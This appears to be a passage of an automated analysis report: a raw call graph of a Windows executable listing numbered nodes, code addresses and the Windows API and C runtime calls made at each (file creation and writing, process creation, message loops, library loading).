3 library calls 94190->94247 94192->94170 94192->94178 94192->94181 94192->94186 94192->94190 94192->94195 94196 7ff797843c20 94192->94196 94217 7ff79783ef9c 46 API calls 94192->94217 94219 7ff7978520d0 45 API calls 94192->94219 94220 7ff797835af8 300 API calls 94192->94220 94221 7ff797855114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94192->94221 94222 7ff7978535c8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94192->94222 94223 7ff797854f0c 34 API calls _onexit 94192->94223 94224 7ff7978550b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94192->94224 94225 7ff7978536c4 77 API calls 94192->94225 94226 7ff7978537dc 300 API calls 94192->94226 94231 7ff79783ee20 94192->94231 94241 7ff79789ac10 18 API calls 94192->94241 94242 7ff79783e0a8 94192->94242 94195->94160 94198 7ff797843c80 94196->94198 94197 7ff797855114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94197->94198 94198->94197 94199 7ff7978905be 94198->94199 94200 7ff797843dde 94198->94200 94203 7ff797844a8f 94198->94203 94206 7ff797844fe7 94198->94206 94210 7ff79783e0a8 4 API calls 94198->94210 94212 7ff797844aa9 94198->94212 94214 7ff7978550b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94198->94214 94215 7ff797839640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94198->94215 94216 7ff797854f0c 34 API calls __scrt_initialize_thread_safe_statics 94198->94216 94248 7ff797845360 300 API calls Concurrency::wait 94198->94248 94249 7ff7978b34e4 77 API calls 3 library calls 94198->94249 94250 7ff7978b34e4 77 API calls 3 library calls 94199->94250 94200->94192 94204 7ff797844ac0 94203->94204 94208 7ff79788fefe 94203->94208 94203->94212 94204->94192 94205 7ff7978905d1 94205->94192 94209 7ff79783e0a8 4 API calls 94206->94209 94207 7ff79783e0a8 4 API calls 94207->94200 94211 7ff79783e0a8 4 API calls 94208->94211 94209->94200 94210->94198 94211->94204 94212->94204 94212->94207 94214->94198 94215->94198 94216->94198 94217->94192 94218->94177 94219->94192 94220->94192 94222->94192 94223->94192 94225->94192 94226->94192 94227->94195 94228->94167 94229->94176 94230->94192 94232 7ff79783ee3a 94231->94232 94239 7ff79783ee78 Concurrency::wait 94231->94239 94233 7ff79783eeac 94232->94233 94234 7ff79783ee42 Concurrency::wait 94232->94234 94235 7ff79783e0a8 4 API calls 94233->94235 94236 7ff79788a6db 94234->94236 94238 7ff79783ee5d 94234->94238 94234->94239 94235->94239 94237 7ff79788a68a VariantClear 94236->94237 94236->94239 94237->94239 94238->94239 94251 7ff79789b46c 15 API calls 94238->94251 94239->94192 94241->94192 94243 7ff79783e0bb 94242->94243 94244 7ff79783e0b6 94242->94244 94243->94192 94252 7ff79783f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94244->94252 94246->94190 94247->94190 94248->94198 94249->94198 94250->94205 94251->94239 94252->94243 94253 7ff79786c51c 94254 7ff79786c567 94253->94254 94258 7ff79786c52b fread_s 94253->94258 94261 7ff7978655d4 15 API calls abort 94254->94261 94256 7ff79786c54e HeapAlloc 94257 7ff79786c565 94256->94257 94256->94258 94258->94254 94258->94256 94260 7ff79785925c EnterCriticalSection LeaveCriticalSection fread_s 94258->94260 94260->94258 94261->94257 94262 7ff79788e263 94263 7ff79788e271 94262->94263 94273 7ff797842680 94262->94273 94263->94263 94264 7ff7978429c8 PeekMessageW 94264->94273 94265 7ff7978426da GetInputState 94265->94264 94265->94273 94267 7ff79788d181 TranslateAcceleratorW 94267->94273 94268 7ff797842a1f TranslateMessage DispatchMessageW 94269 7ff797842a33 PeekMessageW 94268->94269 94269->94273 94270 7ff7978428b9 timeGetTime 94270->94273 94271 7ff79788d2bb timeGetTime 94379 7ff797852ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94271->94379 94273->94264 94273->94265 94273->94267 94273->94268 94273->94269 94273->94270 94273->94271 94278 7ff797843c20 300 API calls 94273->94278 94279 7ff797842856 94273->94279 94280 7ff7978b34e4 77 API calls 94273->94280 94282 7ff797842b70 94273->94282 94289 7ff797842e30 94273->94289 94345 7ff7978466c0 94273->94345 94378 7ff797852de8 IsDialogMessageW GetClassLongPtrW 94273->94378 94380 7ff7978b3a28 18 API calls 94273->94380 94381 7ff7978ca320 300 API calls Concurrency::wait 94273->94381 94278->94273 94280->94273 94283 7ff797842ba9 94282->94283 94284 7ff797842b96 94282->94284 94383 7ff7978b34e4 77 API calls 3 library calls 94283->94383 94382 7ff797842050 301 API calls memcpy_s 94284->94382 94286 7ff797842b9e 94286->94273 94288 7ff79788e55c 94290 7ff797842e90 94289->94290 94291 7ff797843c20 300 API calls 94290->94291 94293 7ff797842ee6 94290->94293 94292 7ff79788e581 94291->94292 94292->94293 94413 7ff7978b34e4 77 API calls 3 library calls 94292->94413 94306 7ff797842f71 94293->94306 94414 7ff797855114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94293->94414 94316 7ff797843169 94306->94316 94322 7ff79784318a 94306->94322 94338 7ff7978431e5 94306->94338 94415 7ff797855114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94306->94415 94416 7ff797839640 94306->94416 94419 7ff797854f0c 34 API calls _onexit 94306->94419 94420 7ff7978550b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94306->94420 94309 7ff79788f1d9 94312 7ff79788f206 94309->94312 94319 7ff79788f21b 94309->94319 94341 7ff7978432f3 94309->94341 94384 7ff7978b08b4 94309->94384 94311 7ff797843b37 94412 7ff797838444 300 API calls 94311->94412 94430 7ff79784e65c 36 API calls 94312->94430 94313 7ff79788f245 94316->94322 94316->94338 94421 7ff7978b34e4 77 API calls 3 library calls 94316->94421 94317 7ff797843c20 300 API calls 94317->94322 94431 7ff79784e6bc 36 API calls 94319->94431 94322->94317 94324 7ff79788eb0c 94322->94324 94325 7ff79788e9ba 94322->94325 94329 7ff79788e926 94322->94329 94332 7ff79788eb1c 94322->94332 94322->94338 94322->94341 94395 7ff797845700 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94322->94395 94424 7ff7978ca320 300 API calls Concurrency::wait 94322->94424 94426 7ff7978b34e4 77 API calls 3 library calls 94324->94426 94425 7ff7978b34e4 77 API calls 3 library calls 94325->94425 94328 7ff797843c20 300 API calls 94328->94338 94422 7ff7978c79d8 98 API calls Concurrency::wait 94329->94422 94332->94341 94427 7ff7978b34e4 77 API calls 3 library calls 94332->94427 94333 7ff79788e949 94333->94341 94423 7ff7978b34e4 77 API calls 3 library calls 94333->94423 94335 7ff7978b34e4 77 API calls 94335->94338 94337 7ff79788f095 94428 7ff7978b34e4 77 API calls 3 library calls 94337->94428 94338->94309 94338->94311 94338->94328 94338->94335 94338->94337 94340 7ff79788f197 94338->94340 94338->94341 94343 7ff7978439c1 94338->94343 94396 7ff797845700 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94338->94396 94397 7ff79783fc30 36 API calls 94338->94397 94399 7ff79783eff8 94338->94399 94429 7ff7978b34e4 77 API calls 3 library calls 94340->94429 94341->94273 94343->94341 94398 7ff79783f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94343->94398 94370 7ff79784673b memcpy_s Concurrency::wait 94345->94370 94346 7ff797891fac 94348 7ff797891fbe 94346->94348 94629 7ff7978cab30 300 API calls Concurrency::wait 94346->94629 94348->94273 94350 7ff79783ec00 4 API calls 94350->94370 94351 7ff797846c0f 94352 7ff797891fc9 94351->94352 94353 7ff797846c3d 94351->94353 94630 7ff7978b34e4 77 API calls 3 library calls 94352->94630 94355 7ff79783ee20 18 API calls 94353->94355 94357 7ff797846c4a 94355->94357 94627 7ff797851fcc 300 API calls 94357->94627 94360 7ff797846d40 9 API calls 94360->94370 94361 7ff797854c68 4 API calls 94361->94370 94362 7ff7978920c1 94371 7ff797846b15 94362->94371 94633 7ff7978b34e4 77 API calls 3 library calls 94362->94633 94363 7ff797846c78 94628 7ff79784e8f4 18 API calls 94363->94628 94366 7ff797843c20 300 API calls 94366->94370 94367 7ff797892032 94631 7ff7978b34e4 77 API calls 3 library calls 94367->94631 94369 7ff79783e0a8 4 API calls 94369->94370 94370->94346 94370->94350 94370->94351 94370->94352 94370->94357 94370->94360 94370->94361 94370->94362 94370->94363 94370->94366 94370->94367 94370->94369 94370->94371 94511 7ff7978b5b80 94370->94511 94517 7ff7978b8ea0 94370->94517 94550 7ff7978b8e98 94370->94550 94583 7ff7978cf0ac 94370->94583 94586 7ff7978bf084 94370->94586 94591 7ff7978b7e48 94370->94591 94625 7ff797855114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94370->94625 94626 7ff7978550b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94370->94626 94632 7ff7978c8d98 49 API calls Concurrency::wait 94370->94632 94371->94273 94378->94273 94379->94273 94380->94273 94381->94273 94382->94286 94383->94288 94385 7ff7978b08f3 94384->94385 94390 7ff7978b08cb 94384->94390 94385->94312 94386 7ff7978b08f5 94461 7ff7978546dc 48 API calls 94386->94461 94387 7ff7978b08fa 94432 7ff79783d4cc 94387->94432 94390->94385 94390->94386 94390->94387 94393 7ff7978b08ee 94390->94393 94460 7ff79783fc30 36 API calls 94393->94460 94395->94322 94396->94338 94397->94338 94398->94341 94494 7ff797841a30 94399->94494 94401 7ff79783f029 94402 7ff79788a7a8 94401->94402 94403 7ff79783f040 94401->94403 94404 7ff79783ee20 18 API calls 94402->94404 94406 7ff797854c68 4 API calls 94403->94406 94405 7ff79788a7bc 94404->94405 94407 7ff79783f066 94406->94407 94409 7ff79783f08f 94407->94409 94509 7ff79783f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94407->94509 94505 7ff79783f1bc 94409->94505 94411 7ff79783f0c6 94411->94338 94412->94341 94413->94293 94417 7ff797854c68 4 API calls 94416->94417 94418 7ff797839663 94417->94418 94418->94306 94419->94306 94421->94322 94422->94333 94423->94341 94424->94322 94425->94341 94426->94332 94427->94341 94428->94340 94429->94309 94430->94319 94431->94313 94433 7ff79783d50b 94432->94433 94446 7ff79783d4f2 94432->94446 94434 7ff79783d513 94433->94434 94435 7ff79783d53e 94433->94435 94462 7ff79785956c 31 API calls 94434->94462 94436 7ff797889cc4 94435->94436 94438 7ff79783d550 94435->94438 94445 7ff797889bbc 94435->94445 94476 7ff797859538 31 API calls 94436->94476 94468 7ff797854834 46 API calls 94438->94468 94440 7ff79783d522 94463 7ff79783ec00 94440->94463 94442 7ff797889cdc 94450 7ff797889c3e Concurrency::wait wcscpy 94445->94450 94469 7ff797854c68 94445->94469 94451 7ff797837c24 94446->94451 94448 7ff797889c0a 94449 7ff79783ec00 4 API calls 94448->94449 94449->94450 94475 7ff797854834 46 API calls 94450->94475 94452 7ff79787d21e 94451->94452 94453 7ff797837c36 94451->94453 94488 7ff79785364c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94452->94488 94480 7ff797837c48 94453->94480 94456 7ff797837c42 94456->94385 94457 7ff79787d22b 94458 7ff79783e0a8 4 API calls 94457->94458 94459 7ff79787d236 Concurrency::wait 94458->94459 94460->94385 94461->94387 94462->94440 94464 7ff79783ec1d 94463->94464 94465 7ff79788a5a2 94464->94465 94466 7ff797854c68 4 API calls 94464->94466 94467 7ff79783ec55 memcpy_s 94466->94467 94467->94446 94468->94440 94472 7ff797854c2c 94469->94472 94470 7ff797854c50 94470->94448 94472->94469 94472->94470 94477 7ff79785925c EnterCriticalSection LeaveCriticalSection fread_s 94472->94477 94478 7ff797855600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 94472->94478 94479 7ff797855620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 94472->94479 94475->94436 94476->94442 94477->94472 94479->94472 94481 7ff797837c73 94480->94481 94484 7ff797837cab memcpy_s 94480->94484 94482 7ff797837c9c 94481->94482 94481->94484 94485 7ff79787d256 94481->94485 94489 7ff79783b960 94482->94489 94484->94456 94486 7ff797854c68 4 API calls 94485->94486 94487 7ff79787d2a6 memcpy_s 94486->94487 94488->94457 94490 7ff79783b981 94489->94490 94493 7ff79783b976 memcpy_s 94489->94493 94491 7ff797854c68 4 API calls 94490->94491 94492 7ff79787ef2a 94490->94492 94491->94493 94493->94484 94495 7ff797841a48 94494->94495 94496 7ff797841c5f 94494->94496 94504 7ff797841a90 94495->94504 94510 7ff797855114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94495->94510 94496->94401 94504->94401 94506 7ff79783f1ce 94505->94506 94508 7ff79783f1d8 94505->94508 94507 7ff797841a30 45 API calls 94506->94507 94507->94508 94508->94411 94509->94409 94512 7ff7978b5ba5 94511->94512 94513 7ff7978b5ba9 94512->94513 94514 7ff7978b5be5 FindClose 94512->94514 94515 7ff7978b5bd5 94512->94515 94513->94370 94514->94513 94515->94513 94634 7ff797837ab8 94515->94634 94518 7ff7978ba680 94517->94518 94524 7ff7978ba71a 94518->94524 94670 7ff79783834c 94518->94670 94521 7ff7978ba7fd 94663 7ff7978b1864 94521->94663 94522 7ff79783d4cc 48 API calls 94525 7ff7978ba6d0 94522->94525 94523 7ff7978ba6f3 94523->94370 94524->94521 94524->94523 94529 7ff7978ba770 94524->94529 94679 7ff797836838 94525->94679 94528 7ff7978ba805 94667 7ff7978ab334 94528->94667 94531 7ff79783d4cc 48 API calls 94529->94531 94538 7ff7978ba778 94531->94538 94532 7ff7978ba6e6 94532->94523 94535 7ff797837ab8 CloseHandle 94532->94535 94534 7ff7978ba7ee 94645 7ff7978ab3a8 94534->94645 94535->94523 94536 7ff7978ba7a7 94695 7ff7978398e8 94536->94695 94538->94534 94538->94536 94540 7ff7978ba7b5 94542 7ff79783e0a8 4 API calls 94540->94542 94541 7ff797838314 CloseHandle 94543 7ff7978ba85c 94541->94543 94544 7ff7978ba7c2 94542->94544 94543->94523 94546 7ff797837ab8 CloseHandle 94543->94546 94698 7ff7978371f8 94544->94698 94546->94523 94547 7ff7978ba7d3 94548 7ff7978ab3a8 12 API calls 94547->94548 94549 7ff7978ba7e0 Concurrency::wait 94548->94549 94549->94523 94549->94541 94551 7ff7978ba680 94550->94551 94552 7ff79783834c 5 API calls 94551->94552 94557 7ff7978ba71a 94551->94557 94553 7ff7978ba6be 94552->94553 94555 7ff79783d4cc 48 API calls 94553->94555 94554 7ff7978ba7fd 94559 7ff7978b1864 6 API calls 94554->94559 94558 7ff7978ba6d0 94555->94558 94556 7ff7978ba6f3 94556->94370 94557->94554 94557->94556 94562 7ff7978ba770 94557->94562 94560 7ff797836838 16 API calls 94558->94560 94561 7ff7978ba805 94559->94561 94563 7ff7978ba6e2 94560->94563 94566 7ff7978ab334 4 API calls 94561->94566 94564 7ff79783d4cc 48 API calls 94562->94564 94563->94557 94565 7ff7978ba6e6 94563->94565 94571 7ff7978ba778 94564->94571 94565->94556 94568 7ff797837ab8 CloseHandle 94565->94568 94582 7ff7978ba7e0 Concurrency::wait 94566->94582 94567 7ff7978ba7ee 94570 7ff7978ab3a8 12 API calls 94567->94570 94568->94556 94569 7ff7978ba7a7 94572 7ff7978398e8 4 API calls 94569->94572 94570->94582 94571->94567 94571->94569 94573 7ff7978ba7b5 94572->94573 94575 7ff79783e0a8 4 API calls 94573->94575 94574 7ff797838314 CloseHandle 94576 7ff7978ba85c 94574->94576 94577 7ff7978ba7c2 94575->94577 94576->94556 94579 7ff797837ab8 CloseHandle 94576->94579 94578 7ff7978371f8 4 API calls 94577->94578 94580 7ff7978ba7d3 94578->94580 94579->94556 94581 7ff7978ab3a8 12 API calls 94580->94581 94581->94582 94582->94556 94582->94574 94745 7ff7978cf630 94583->94745 94587 7ff79783ee20 18 API calls 94586->94587 94588 7ff7978bf09c 94587->94588 94589 7ff7978b070c 6 API calls 94588->94589 94590 7ff7978bf0a4 94589->94590 94590->94370 94592 7ff7978b7e79 94591->94592 94593 7ff797839640 4 API calls 94592->94593 94594 7ff7978b7f55 Concurrency::wait 94592->94594 94595 7ff7978b7ea6 94593->94595 94596 7ff79783834c 5 API calls 94594->94596 94619 7ff7978b7fe5 94594->94619 94597 7ff797839640 4 API calls 94595->94597 94598 7ff7978b7f99 94596->94598 94599 7ff7978b7eaf 94597->94599 94600 7ff79783d4cc 48 API calls 94598->94600 94601 7ff79783d4cc 48 API calls 94599->94601 94602 7ff7978b7fab 94600->94602 94603 7ff7978b7ebe 94601->94603 94604 7ff797836838 16 API calls 94602->94604 94826 7ff7978374ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94603->94826 94606 7ff7978b7fba 94604->94606 94608 7ff7978b7ff5 94606->94608 94609 7ff7978b7fbe GetLastError 94606->94609 94607 7ff7978b7ed8 94610 7ff797837c24 4 API calls 94607->94610 94614 7ff797839640 4 API calls 94608->94614 94611 7ff7978b7fd8 94609->94611 94612 7ff7978b7f07 94610->94612 94613 7ff797837ab8 CloseHandle 94611->94613 94611->94619 94612->94594 94827 7ff7978abdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 94612->94827 94613->94619 94617 7ff7978b8035 94614->94617 94616 7ff7978b7f17 94616->94594 94618 7ff7978b7f1b 94616->94618 94617->94619 94829 7ff7978a0d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94617->94829 94621 7ff79783ec00 4 API calls 94618->94621 94619->94370 94622 7ff7978b7f28 94621->94622 94828 7ff7978abab8 8 API calls Concurrency::wait 94622->94828 94624 7ff7978b7f31 Concurrency::wait 94624->94594 94627->94363 94628->94363 94629->94348 94630->94371 94631->94371 94632->94370 94633->94371 94637 7ff7978382e4 94634->94637 94642 7ff797838314 94637->94642 94639 7ff7978382f2 Concurrency::wait 94640 7ff797838314 CloseHandle 94639->94640 94641 7ff797838303 94640->94641 94643 7ff79783832a 94642->94643 94644 7ff79783833d CloseHandle 94642->94644 94643->94639 94644->94643 94646 7ff7978ab42a 94645->94646 94647 7ff7978ab3c8 94645->94647 94650 7ff7978ab334 4 API calls 94646->94650 94648 7ff7978ab3d0 94647->94648 94649 7ff7978ab41e 94647->94649 94652 7ff7978ab3f1 94648->94652 94653 7ff7978ab3dd 94648->94653 94715 7ff7978ab458 8 API calls 94649->94715 94662 7ff7978ab410 Concurrency::wait 94650->94662 94713 7ff79783a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94652->94713 94711 7ff79783a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94653->94711 94656 7ff7978ab3e2 94712 7ff797854120 6 API calls 94656->94712 94657 7ff7978ab3f6 94714 7ff7978ab270 6 API calls 94657->94714 94660 7ff7978ab3ef 94708 7ff7978ab384 94660->94708 94662->94549 94664 7ff7978b1873 94663->94664 94666 7ff7978b1878 94663->94666 94716 7ff7978b070c 94664->94716 94666->94528 94737 7ff7978ab188 94667->94737 94671 7ff797854c68 4 API calls 94670->94671 94672 7ff797838363 94671->94672 94673 7ff797838314 CloseHandle 94672->94673 94674 7ff79783836f 94673->94674 94675 7ff797839640 4 API calls 94674->94675 94676 7ff797838378 94675->94676 94677 7ff797838314 CloseHandle 94676->94677 94678 7ff797838380 94677->94678 94678->94522 94680 7ff797838314 CloseHandle 94679->94680 94681 7ff79783685a 94680->94681 94682 7ff79783687d CreateFileW 94681->94682 94683 7ff79787caa8 94681->94683 94684 7ff7978368ab 94682->94684 94685 7ff79787caae CreateFileW 94683->94685 94692 7ff7978368d9 94683->94692 94691 7ff7978368e4 94684->94691 94742 7ff7978368f4 9 API calls 94684->94742 94685->94684 94686 7ff79787cae6 94685->94686 94744 7ff797836a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94686->94744 94688 7ff79787caf3 94688->94684 94690 7ff7978368c1 94690->94692 94743 7ff797836a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94690->94743 94691->94524 94691->94532 94692->94691 94694 7ff7978ab334 4 API calls 94692->94694 94694->94691 94696 7ff797854c68 4 API calls 94695->94696 94697 7ff797839918 94696->94697 94697->94540 94699 7ff79783721c 94698->94699 94701 7ff79787cd0c 94698->94701 94700 7ff797837274 94699->94700 94704 7ff79787cd66 memcpy_s 94699->94704 94702 7ff79783b960 4 API calls 94700->94702 94705 7ff797854c68 4 API calls 94701->94705 94703 7ff797837283 memcpy_s 94702->94703 94703->94547 94706 7ff797854c68 4 API calls 94704->94706 94705->94704 94707 7ff79787cdda memcpy_s 94706->94707 94709 7ff7978ab334 4 API calls 94708->94709 94710 7ff7978ab399 94709->94710 94710->94662 94711->94656 94712->94660 94713->94657 94714->94660 94715->94662 94717 7ff7978b072e 94716->94717 94734 7ff7978b0768 memcpy_s Concurrency::wait 94716->94734 94719 7ff7978b07a4 94717->94719 94720 7ff7978b074a 94717->94720 94721 7ff7978b0773 94717->94721 94718 7ff797854c68 4 API calls 94718->94734 94723 7ff7978b07c2 94719->94723 94726 7ff797854c68 4 API calls 94719->94726 94720->94721 94722 7ff7978b0759 94720->94722 94721->94718 94729 7ff797854c68 4 API calls 94722->94729 94724 7ff7978b07fc 94723->94724 94725 7ff7978b07ec 94723->94725 94723->94734 94728 7ff797854c68 4 API calls 94724->94728 94727 7ff797854c68 4 API calls 94725->94727 94726->94723 94727->94734 94730 7ff7978b0807 94728->94730 94729->94734 94735 7ff79784f380 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94730->94735 94732 7ff7978b0817 94736 7ff797854120 6 API calls 94732->94736 94734->94666 94735->94732 94736->94734 94738 7ff7978ab193 94737->94738 94739 7ff7978ab19c WriteFile 94737->94739 94741 7ff7978ab208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94738->94741 94739->94549 94741->94739 94742->94690 94743->94692 94744->94688 94746 7ff7978cf671 memcpy_s 94745->94746 94747 7ff79783d4cc 48 API calls 94746->94747 94748 7ff7978cf74d 94747->94748 94813 7ff79783e330 94748->94813 94750 7ff7978cf759 94751 7ff7978cf840 94750->94751 94752 7ff7978cf762 94750->94752 94753 7ff7978cf87d GetCurrentDirectoryW 94751->94753 94755 7ff79783d4cc 48 API calls 94751->94755 94754 7ff79783d4cc 48 API calls 94752->94754 94756 7ff797854c68 4 API calls 94753->94756 94757 7ff7978cf777 94754->94757 94758 7ff7978cf85c 94755->94758 94759 7ff7978cf8a7 GetCurrentDirectoryW 94756->94759 94760 7ff79783e330 4 API calls 94757->94760 94761 7ff79783e330 4 API calls 94758->94761 94762 7ff7978cf8b5 94759->94762 94763 7ff7978cf783 94760->94763 94764 7ff7978cf868 94761->94764 94765 7ff7978cf8f0 94762->94765 94817 7ff79784f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94762->94817 94766 7ff79783d4cc 48 API calls 94763->94766 94764->94753 94764->94765 94773 7ff7978cf905 94765->94773 94774 7ff7978cf901 94765->94774 94768 7ff7978cf798 94766->94768 94770 7ff79783e330 4 API calls 94768->94770 94769 7ff7978cf8d0 94818 7ff79784f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94769->94818 94772 7ff7978cf7a4 94770->94772 94776 7ff79783d4cc 48 API calls 94772->94776 94820 7ff7978afddc 8 API calls 94773->94820 94778 7ff7978cfa0f CreateProcessW 94774->94778 94779 7ff7978cf972 94774->94779 94775 7ff7978cf8e0 94819 7ff79784f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94775->94819 94781 7ff7978cf7b9 94776->94781 94810 7ff7978cf9b4 94778->94810 94823 7ff79789d1f8 99 API calls 94779->94823 94784 7ff79783e330 4 API calls 94781->94784 94782 7ff7978cf90e 94821 7ff7978afca8 8 API calls 94782->94821 94786 7ff7978cf7c5 94784->94786 94788 7ff7978cf806 GetSystemDirectoryW 94786->94788 94791 7ff79783d4cc 48 API calls 94786->94791 94787 7ff7978cf926 94822 7ff7978afafc 8 API calls ~SyncLockT 94787->94822 94790 7ff797854c68 4 API calls 94788->94790 94793 7ff7978cf830 GetSystemDirectoryW 94790->94793 94794 7ff7978cf7e1 94791->94794 94792 7ff7978cf94f 94792->94774 94793->94762 94796 7ff79783e330 4 API calls 94794->94796 94795 7ff7978cfabe CloseHandle 94797 7ff7978cfaf5 94795->94797 94798 7ff7978cfacc 94795->94798 94799 7ff7978cf7ed 94796->94799 94801 7ff7978cfafe 94797->94801 94805 7ff7978cfb26 CloseHandle 94797->94805 94824 7ff7978af7dc CloseHandle ~SyncLockT 94798->94824 94799->94762 94799->94788 94809 7ff7978cfaa3 94801->94809 94803 7ff7978cfa64 94806 7ff7978cfa84 GetLastError 94803->94806 94805->94809 94806->94809 94825 7ff7978af51c CloseHandle ~SyncLockT 94809->94825 94810->94795 94810->94803 94811 7ff7978cf0c2 94811->94370 94814 7ff79783e342 94813->94814 94815 7ff797854c68 4 API calls 94814->94815 94816 7ff79783e361 wcscpy 94815->94816 94816->94750 94817->94769 94818->94775 94819->94765 94820->94782 94821->94787 94822->94792 94823->94810 94825->94811 94826->94607 94827->94616 94828->94624 94829->94619 94830 7ff797855328 94853 7ff797854cac 94830->94853 94833 7ff797855474 94883 7ff7978557e4 7 API calls 2 library calls 94833->94883 94834 7ff797855344 94836 7ff79785547e 94834->94836 94838 7ff797855362 94834->94838 94884 7ff7978557e4 7 API calls 2 library calls 94836->94884 94839 7ff797855387 94838->94839 94845 7ff7978553a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 94838->94845 94859 7ff79786ada4 94838->94859 94840 7ff797855489 abort 94842 7ff79785540d 94866 7ff797855930 94842->94866 94844 7ff797855412 94869 7ff797833730 94844->94869 94845->94842 94880 7ff797859204 35 API calls __FrameHandler3::FrameUnwindToState 94845->94880 94850 7ff797855435 94850->94840 94882 7ff797854e90 8 API calls 2 library calls 94850->94882 94852 7ff79785544c 94852->94839 94854 7ff797854cce __scrt_initialize_crt 94853->94854 94885 7ff7978565ec 94854->94885 94856 7ff797854cd3 __scrt_initialize_crt 94858 7ff797854cd7 94856->94858 94893 7ff797856620 8 API calls 3 library calls 94856->94893 94858->94833 94858->94834 94860 7ff79786adff 94859->94860 94861 7ff79786ade0 94859->94861 94860->94845 94861->94860 94918 7ff797831064 94861->94918 94923 7ff797831048 94861->94923 94928 7ff7978310e8 94861->94928 94933 7ff797831080 94861->94933 95149 7ff797856240 94866->95149 94870 7ff7978337a3 94869->94870 94871 7ff797833743 IsThemeActive 94869->94871 94881 7ff797855974 GetModuleHandleW 94870->94881 95151 7ff7978592d0 94871->95151 94877 7ff79783377d 95163 7ff7978337b0 94877->95163 94880->94842 94881->94850 94882->94852 94883->94836 94884->94840 94886 7ff7978565f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 94885->94886 94894 7ff797857290 94886->94894 94890 7ff79785660c 94892 7ff797856603 94890->94892 94901 7ff7978572d8 DeleteCriticalSection 94890->94901 94892->94856 94893->94858 94896 7ff797857298 94894->94896 94897 7ff7978572c9 94896->94897 94898 7ff7978565ff 94896->94898 94902 7ff797857614 94896->94902 94907 7ff7978572d8 DeleteCriticalSection 94897->94907 94898->94892 94900 7ff797857218 8 API calls 3 library calls 94898->94900 94900->94890 94901->94892 94908 7ff797857310 94902->94908 94905 7ff797857654 94905->94896 94906 7ff79785765f InitializeCriticalSectionAndSpinCount 94906->94905 94907->94898 94909 7ff797857371 94908->94909 94916 7ff79785736c try_get_function 94908->94916 94909->94905 94909->94906 94910 7ff797857454 94910->94909 94913 7ff797857462 GetProcAddress 94910->94913 94911 7ff7978573a0 LoadLibraryExW 94912 7ff7978573c1 GetLastError 94911->94912 94911->94916 94912->94916 94914 7ff797857473 94913->94914 94914->94909 94915 7ff797857439 FreeLibrary 94915->94916 94916->94909 94916->94910 94916->94911 94916->94915 94917 7ff7978573fb LoadLibraryExW 94916->94917 94917->94916 94938 7ff797837ec0 94918->94938 94920 7ff79783106d 94974 7ff797854ebc 34 API calls _onexit 94920->94974 94922 7ff797854f15 94922->94861 95041 7ff797837718 94923->95041 94927 7ff797854f15 94927->94861 95060 7ff797851d80 94928->95060 94932 7ff797854f15 94932->94861 95085 7ff797837920 94933->95085 94935 7ff79783109e 95115 7ff797854ebc 34 API calls _onexit 94935->95115 94937 7ff797854f15 94937->94861 94975 7ff7978382b4 94938->94975 94941 7ff7978382b4 4 API calls 94942 7ff797837f3a 94941->94942 94943 7ff797839640 4 API calls 94942->94943 94944 7ff797837f46 94943->94944 94982 7ff797837cf4 94944->94982 94946 7ff797837f59 94992 7ff797852d5c 6 API calls 94946->94992 94948 7ff797837fa5 94949 7ff797839640 4 API calls 94948->94949 94950 7ff797837fb1 94949->94950 94951 7ff797839640 4 API calls 94950->94951 94952 7ff797837fbd 94951->94952 94953 7ff797839640 4 API calls 94952->94953 94954 7ff797837fc9 94953->94954 94955 7ff797839640 4 API calls 94954->94955 94956 7ff79783800f 94955->94956 94957 7ff797839640 4 API calls 94956->94957 94958 7ff7978380f7 94957->94958 94993 7ff79784ef88 94958->94993 94960 7ff797838103 95000 7ff79784eec8 94960->95000 94962 7ff79783812f 94963 7ff797839640 4 API calls 94962->94963 94964 7ff79783813b 94963->94964 95011 7ff797846d40 94964->95011 94968 7ff7978381ac 94969 7ff7978381be GetStdHandle 94968->94969 94970 7ff797838220 OleInitialize 94969->94970 94971 7ff79787d350 94969->94971 